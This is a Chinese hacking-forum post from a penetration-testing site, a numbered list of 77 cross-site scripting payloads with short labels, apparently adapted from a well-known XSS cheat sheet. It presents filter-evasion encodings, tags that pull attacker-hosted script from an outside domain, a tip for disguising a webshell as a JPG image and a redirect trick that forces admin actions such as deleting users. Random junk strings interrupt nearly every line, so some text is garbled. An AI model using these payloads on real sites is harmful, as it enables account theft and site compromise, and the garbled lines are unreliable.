中国网络渗透测试联盟

标题: xss详细利用大全1 [打印本页]
作者: admin    时间: 2012-9-13 17:04
标题: xss详细利用大全1
跨站图片shell
, n1 U; m* ~/ b$ M, a% `3 MXSS跨站代码  <script>alert("")</script>
3 o; w- R8 f/ t" N3 ]( y) P
7 x, H5 R5 a9 R7 x* J将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
+ ]" i8 y9 E9 w0 U) e" \7 Y+ s" B9 _4 s, ?1 q3 c. S- ]

3 B' i/ K, H2 t) K- `8 u8 r" F1 e
5 o% V7 v( m# X' W0 J$ t  ?! ^1)普通的XSS JavaScript注入% N$ r! m) K# R4 {% W
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>1 Q; E- i5 R. R. v' u' U
" @3 E1 \) m6 c, e+ H7 w8 D2 [* t; d
(2)IMG标签XSS使用JavaScript命令
, @' |) z& S2 x! E5 b<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>6 C0 O" z) U) }5 ^# ]! m' i
/ W6 a7 ~& Y6 @
(3)IMG标签无分号无引号' U# B5 \( s/ h; G# k( H4 m6 X0 P
<IMG SRC=javascript:alert(‘XSS’)>
8 O! f. k+ h& A) R. N( o# c7 m+ `+ T7 o3 @" F; O0 j( P
(4)IMG标签大小写不敏感
1 B0 I4 v/ \) v" T5 n+ [/ s( y' M<IMG SRC=JaVaScRiPt:alert(‘XSS’)>, t( j6 f0 @5 j$ L7 K* y" Z, ]7 c

$ M6 O6 O8 N5 _" F# N(5)HTML编码(必须有分号)
4 B# I2 p, m+ R- N<IMG SRC=javascript:alert(“XSS”)>
' ]6 Q6 f# m4 v! V  b' O) ~9 T: l$ |+ I" \& T+ i
(6)修正缺陷IMG标签9 @3 M+ |! c; U% Z. ^
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- e; p! E7 O  E8 K
5 P. @1 j1 z% ^- n, y+ c1 s! _. d
(7)formCharCode标签(计算器)
  M4 m! j7 ?. c2 z# ], @<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
% Q: q' N. W" C, j6 t8 y& t/ ^. e1 w
(8)UTF-8的Unicode编码(计算器)% V; I7 H  B! Y% S  i. ~: v3 o; p
<IMG SRC=jav..省略..S')>4 @7 H( l8 ?* t, p) I) q5 J+ k

6 }6 G5 l; I0 h# N; F(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
  {+ s2 ]. n, k& S<IMG SRC=jav..省略..S')>1 G/ d/ v# m. n0 \$ Q

' u& }0 X) V: |( |3 V(10)十六进制编码也是没有分号(计算器)5 W' Z$ i( E- S( i; P( G
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>5 _1 b1 K) B* l/ {3 H

3 z  X6 `# O4 H2 h(11)嵌入式标签,将Javascript分开% X/ d" }9 a( D* X0 j' S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
7 L# Y0 u% b6 Z. A% L/ {7 K. N2 ~( m$ g1 a8 m9 b4 w7 h# G) R
(12)嵌入式编码标签,将Javascript分开
# q5 |& a/ @" i7 C. @: q1 k# f<IMG SRC=”jav ascript:alert(‘XSS’);”>
: f& K5 C0 u2 i! v$ A& W3 B4 H8 U, v
/ S. r' y2 r" U6 w$ I! b(13)嵌入式换行符
3 U6 o. P6 D3 V9 N<IMG SRC=”jav ascript:alert(‘XSS’);”>
, F7 C1 M4 y9 Z$ d7 e. q
5 E$ a, J0 m9 E  O5 v(14)嵌入式回车( m) E3 g; U6 U8 f3 p' P
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 [& a/ {2 R3 m4 G, W, v
. w9 V% n9 O6 g5 F* r
(15)嵌入式多行注入JavaScript,这是XSS极端的例子& F. ]9 U' Z, P
<IMG SRC=”javascript:alert(‘XSS‘)”>
8 H* d1 Y9 O  z! o7 v' K' u# W, y2 g  \$ N6 z
(16)解决限制字符(要求同页面)5 s9 Y/ {: u+ S4 N+ m
<script>z=’document.’</script>
  Y8 j- ]! N* ]<script>z=z+’write(“‘</script>
2 B. N9 P0 H8 J<script>z=z+’<script’</script>
  G! h/ X$ G; r5 L/ t9 n<script>z=z+’ src=ht’</script>
9 M8 w0 ~0 m7 Q& ]. J  P<script>z=z+’tp://ww’</script>
$ t) m) p9 o! a<script>z=z+’w.shell’</script>5 K; n2 k3 A! i$ @" @) ^& u
<script>z=z+’.net/1.’</script>
& d5 a! Y7 X$ j<script>z=z+’js></sc’</script>
+ D4 d: P- _' O) d3 E% u+ |<script>z=z+’ript>”)’</script>
; {; \: Q0 n( F2 q' e<script>eval_r(z)</script>% `0 N, r* c* b) [4 O+ Z( K8 J* Y
& N+ g7 H  n3 k7 @* u
(17)空字符
- D3 d9 N* N" Z" Wperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) ]% @& @& m; f( Y
6 Y. w0 A' r6 |' a4 q7 l# n
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用5 j) e( B. _) g: S, }$ L6 {1 g6 E
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* }1 A: c2 P) h. r: q: V
# [7 i8 d1 B7 S/ H+ m
(19)Spaces和meta前的IMG标签9 ~9 `, K4 q, B" d  e8 R" r* [+ r
<IMG SRC=” javascript:alert(‘XSS’);”>
' R* t) Y9 o7 w4 o8 k. v* z. G& q$ v# L  H8 W/ I4 h5 b  j( ^' Y/ N; {
(20)Non-alpha-non-digit XSS
* q" f. ~3 I$ [2 O<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- w, r$ D* ?/ I+ b. r4 |! A$ l

2 E/ ?4 Z& t+ @& g; ~  z(21)Non-alpha-non-digit XSS to 2! U; j2 O& q1 C2 x
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>, M9 z* ^/ v- o, Y& D

  t5 |( P$ x. K. `( J+ L(22)Non-alpha-non-digit XSS to 3
& j; y8 r9 e7 M, g<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- k/ l; u6 k+ ~4 \: M; ?* u: s6 f+ J- ^% m2 @  O! E9 B$ ~
(23)双开括号% R( g6 b" }. K2 r: ?7 A6 e
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
$ m- \$ x0 Y7 z; l* X) Q; z5 v% a5 w
(24)无结束脚本标记(仅火狐等浏览器)
/ S) i4 T; |; r+ A* K6 P9 q# b<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
: H4 ^8 M) ~7 t  A  P5 l
" @8 K+ c9 x, k4 S& h: F% c(25)无结束脚本标记2
2 V" B. J+ l5 C: ~* i" O2 K5 y<SCRIPT SRC=//3w.org/XSS/xss.js>' I) L9 _7 ?; e- l" L3 b9 @  e

7 ~. Z% }! |6 \5 W# N(26)半开的HTML/JavaScript XSS
" P$ @, t) i2 U! ]$ @3 K' k<IMG SRC=”javascript:alert(‘XSS’)”! @5 H! a2 h1 H+ o- P
- G0 B0 n! v6 y+ {/ z& W% S' G
(27)双开角括号$ F9 h# e9 W; M8 }( A6 S
<iframe src=http://3w.org/XSS.html <9 b: ~' x1 Y/ J% P/ A
& g" O6 \! A! I0 K# E0 }( S* d& v- u
(28)无单引号 双引号 分号
  o; i  u/ r, j0 c<SCRIPT>a=/XSS/
" _8 w% g; f% m* t1 v, Palert(a.source)</SCRIPT>! F1 g+ S) t6 x8 e: p, ]
/ y8 i; s2 d0 Y, H9 R9 K1 N
(29)换码过滤的JavaScript8 k6 [- U5 x  t
\”;alert(‘XSS’);//, L& G6 N5 o8 a" |! b

# s4 T4 V% f) i(30)结束Title标签
( l% o# k2 ?6 ^- i! H</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
- E8 W' F& G5 H% D) C( \3 V; z' s+ c; V; [6 u4 Y6 c! B
(31)Input Image* V+ s% J" d$ D4 B: c8 x8 ?( N
<INPUT SRC=”javascript:alert(‘XSS’);”>9 M6 Y! m. f: o; K, K8 }0 t
" H# Y6 D; E* l
(32)BODY Image( H7 @+ k9 c1 h
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
5 v# u* c. F7 @5 V
) C# v. n, S9 M/ v(33)BODY标签5 I- @. z& ]6 r- e7 m" y
<BODY(‘XSS’)>7 ]- p6 ^; E. n, V

* K$ X. I% z! a(34)IMG Dynsrc! P! I$ J4 ?; \" H, E- O+ m" [0 `  c: E
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
/ W# l9 S- N, _! _4 R  W
9 z( H, O4 G+ }, n# M(35)IMG Lowsrc
; o3 @# ?. ~5 @1 h" u<IMG LOWSRC=”javascript:alert(‘XSS’)”>
3 q: V1 T4 J4 g9 k
( Y6 P: N: p: t/ o6 U0 |  Y* S(36)BGSOUND9 M# u) U3 b5 @0 }, @' y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
" l5 G3 k2 O5 D# Q  j; E! u' b; {1 P( g
(37)STYLE sheet
5 }5 U8 |0 y0 w+ i7 k<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>& u/ h/ B) d" D; c0 s+ H4 n$ m, z7 ~

2 c$ c! ~5 U4 k  A" Q4 g(38)远程样式表% B" m; s  x) p3 n/ @4 o6 d
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>3 e# P; y) J" C7 ]5 F$ {
: @& Y' `& Q6 Y: I( `
(39)List-style-image(列表式). ~  |% [) W4 S
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
0 N; w- R3 y7 n: I  f5 Q8 m  h' v% `" |% v2 G  i* u2 k7 l
(40)IMG VBscript( j; M/ E/ ?1 a
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& C' \; \+ w3 c$ Z* T/ Z( j0 ~, K% B$ e& k( Y6 M
(41)META链接url; `' ~; h! t' @) j- L) I3 W/ m/ O
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
1 X- ]5 D1 s) f' r
$ g& u! P! w% s( N! ?  L(42)Iframe
7 q- x: c) d4 W* f( {2 R<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
, F( v, o3 F- ^5 {" A7 n2 J(43)Frame
4 e7 J8 a" }* p2 S" G$ n+ T' W* w<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 h) N8 T! S: T  J" P' O6 C8 a0 N
" q) E0 `  m& e5 t7 @( }(44)Table
  [& u, e6 |  B- B2 t$ t& z<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ `& i9 W. I5 F2 p2 {* @# r1 s) t1 n1 r9 j# a( m
(45)TD
4 h1 g) W: W( {  j4 e! K<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. L0 c- Q. S: O3 J
( p+ p+ a9 _( J
(46)DIV background-image9 Z  n( A# t0 g% w, n' N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
* P6 D1 J: }  ~% y4 e
3 N% C/ C# m" W0 @# U' R(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
" ^& ^; Q/ t4 t2 L1 k2 V6 Q: M<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
% u2 G0 l1 C3 U2 Q6 ]0 Q, G# h/ W1 S
(48)DIV expression
1 Z$ e1 Q5 {+ @0 I7 F; ~<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
4 ?, ~  u* x6 c, a0 Q9 c
( g" I5 ~7 |2 x9 B! Z) i$ w' K(49)STYLE属性分拆表达0 e) M% F, V/ N, s; K
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>, F! }! r' g+ x" X8 d

" I  Z0 N* N5 e(50)匿名STYLE(组成:开角号和一个字母开头)8 a3 T6 @/ @' E: E7 P
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
2 U8 P, o5 f/ K5 V% Z5 f! a& ]+ V
(51)STYLE background-image4 B6 \, T/ S; j( K& U+ C
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
8 R5 d+ E3 T) S/ |% ^; D1 F/ Z
. b2 z/ ~9 |' O1 e(52)IMG STYLE方式7 h' G5 h& }( b8 h9 k
exppression(alert(“XSS”))’>
7 p/ E0 R( k9 U7 _, t& x( Z" y7 {4 X$ r' L2 {8 m0 @
(53)STYLE background
3 B$ D: y' @) ^" `3 E<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>: z1 T/ Q& b) [1 g- k

1 O+ d  d- r/ ~8 [6 ](54)BASE
( n: a0 T7 G" x  O+ v7 I3 {0 Q5 W<BASE HREF=”javascript:alert(‘XSS’);//”>' O( K- |( x) o- Q: k
8 b6 _4 P9 y5 T0 o
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
7 o  R2 j4 m" Y& s7 a<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>( p' e' |4 @1 B  L& \6 G

# Z  g* l0 e3 ?( |: ^) o" i(56)在flash中使用ActionScrpt可以混进你XSS的代码
; o+ ?+ }; p( ~4 g6 Z$ }& aa=”get”;
7 o1 D, H9 l; D# o2 i; Eb=”URL(\”";+ q% w: e4 C0 L$ N8 C
c=”javascript:”;
$ q3 Q4 d% w; C7 \d=”alert(‘XSS’);\”)”;
: e- Q, D  E* seval_r(a+b+c+d);4 [/ w. }6 j0 x1 Y! \9 k
- P7 R" N7 d0 V* W6 _
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 k9 a  ~% m& E5 p4 X# y5 |<HTML xmlns:xss>
& Q5 i. J2 z) }3 o<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>4 ~" K6 a+ k4 @4 T
<xss:xss>XSS</xss:xss>/ N4 X, ^3 M' C2 E: Q# X
</HTML>
$ j+ v8 ^5 V* K2 a( D
* Y6 H4 x/ u8 a4 e% }(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
) h" H. g- }& _3 }, V<SCRIPT SRC=””></SCRIPT>* S" j% X9 @: w- l3 Z
. W) h' i5 E% o# a5 S, R
(59)IMG嵌入式命令,可执行任意命令
  N* b  c* b6 ^* ?0 a5 A<IMG SRC=”http://www.XXX.com/a.php?a=b”>
4 z5 B5 X4 F( o* ^1 x' P; z6 @3 J: W" w" I# e5 b- F
(60)IMG嵌入式命令(a.jpg在同服务器)( Y3 @: e% Y& n8 y" Q- V; w* t; p
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
0 j) Q0 Z7 t9 H3 n+ _
& ~! V4 P0 ]8 m9 R(61)绕符号过滤: K) k+ w) |: Q7 }+ L* Q
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>& X3 x3 m7 ]/ I4 [

( V& q: m4 T& L* l(62)6 u. a; J" s: `- j) @" E3 X
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 S% p) k1 H0 {+ a! T8 N( P5 G
) q$ q4 I: T8 v: J3 Y% g3 P& T(63)1 @% t) Q9 Z* j* n
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
  C' ^3 x+ }0 q9 ]; M( O4 F7 |1 S# C8 [
. ?; t6 c1 b6 ?9 F7 @, y(64)
$ q* w" ^0 g% E- p9 a6 }- h9 G<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>; \, u" B, c, `* \. N7 f5 I

+ l4 p1 W& o! o- C* E4 o$ y- i2 {(65)
: [) F) U( z  o' B- d: f<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( H# G# i" c5 t4 }3 M
4 P- b  E/ j  O9 j% f0 i- m
(66)" |: _5 h" M! y8 y% u7 S
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>6 l/ Z# X2 u- {0 u

1 g7 D1 f- B$ S$ S4 t(67)
1 x) O6 k; U8 J" {2 h# v$ w! y<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT># Y: O1 y  l5 r: m
) a' s$ i& b% v- r1 ~7 I( ^$ h
(68)URL绕行
% p2 C) ?7 n; j& I9 S+ r<A HREF=”http://127.0.0.1/”>XSS</A>0 [) S( E5 t  R+ Q
5 C0 }9 {+ }* p# J- u4 p: L) k1 k
(69)URL编码3 Z4 B  o3 N4 Q. j
<A HREF=”http://3w.org”>XSS</A>
8 f- E* c# M. R: v; j4 M. F; x5 y0 o
(70)IP十进制6 K: s- g- V3 s% z  M& X- r
<A HREF=”http://3232235521″>XSS</A>
3 N7 T2 K9 e' L' a4 L/ m/ l* o! Q
8 J) b$ \1 b& F6 M) L(71)IP十六进制
8 ?, w  \4 w8 ^' R7 Z# R3 }<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>3 f/ M2 h8 a; T" V+ H8 x
/ l% ~: D0 z; t
(72)IP八进制
' v1 u7 F* c0 X0 \- V- g& O* Q<A HREF=”http://0300.0250.0000.0001″>XSS</A>0 A) `; y& v, q' H' a
. V1 h- n; L( @( A
(73)混合编码) V# b& Z0 P' f& ]; X
<A HREF=”h3 c+ ]1 N4 \6 y
tt p://6 6.000146.0×7.147/”">XSS</A>
" B$ Q; h8 l% m4 l! O# V- A9 H, t# n- X$ [, [
(74)节省[http:]( T7 H1 J) K2 ~$ p# `+ T. W) g- q
<A HREF=”//www.google.com/”>XSS</A>
0 F% j2 @' m% l+ Q, D% ~. g( E
, g8 p* l, w6 F(75)节省[www]
' `9 L4 J# E. R7 [! ]' m) c<A HREF=”http://google.com/”>XSS</A>
! d; k" e) V" t4 f1 L0 O
3 y- D! m6 k: l5 T(76)绝对点绝对DNS
3 p0 M8 E  G% o5 C3 \<A HREF=”http://www.google.com./”>XSS</A>
& K& H3 U, n. _% c( N! @  d( s# v- S; x/ Z& {" [% s9 f
(77)javascript链接
) U/ t' n1 w! C<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>; L7 Y+ x) M9 u( o6 H% G




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2